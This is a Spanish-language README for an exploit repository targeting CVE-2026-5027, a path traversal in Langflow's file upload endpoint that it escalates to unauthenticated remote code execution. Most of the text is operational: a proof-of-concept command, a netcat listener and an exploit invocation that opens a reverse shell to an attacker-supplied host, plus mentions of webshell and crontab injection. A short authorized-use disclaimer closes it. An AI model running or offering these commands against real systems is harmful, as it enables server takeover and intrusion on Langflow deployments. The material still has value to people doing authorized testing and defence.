
CVE-2026-5027
Escritura Arbitraria de Archivos a RCE
Ejecución Remota de Código No Autenticada mediante Subida de Archivos
Langflow sufre una vulnerabilidad crítica de path traversal en el endpoint de subida de archivos (POST /api/v2/files).
Un atacante puede enviar un nombre de archivo malicioso que contenga secuencias ../ para escribir archivos arbitrarios en cualquier parte del sistema de archivos del servidor.
Esto conduce fácilmente a una Ejecución Remota de Código (RCE) completa — por ejemplo, colocando una webshell o inyectando en crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
Salida esperada si es vulnerable:
[+] ¡Éxito! Archivo escrito: ../../../tmp/CVE-2026-5027-proof.txt
# Iniciar listener
nc -lvnp 4444
# Ejecutar exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| Archivo | Descripción |
|---|---|
CVE-2026-5027.py | Exploit principal en Python (PoC + RCE) |
CVE-2026-5027.yaml | Plantilla de Nuclei para escaneo |
README.md | Este archivo |
Modo Prueba (Proof)
python3 CVE-2026-5027.py -t http://target.com/ --proof
Modo Reverse Shell
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
Este repositorio es únicamente para fines educativos y de pruebas de seguridad autorizadas.
Úsalo de forma responsable y solo en sistemas para los que tengas permiso explícito de prueba.
Hecho con ❤️ para la comunidad de red team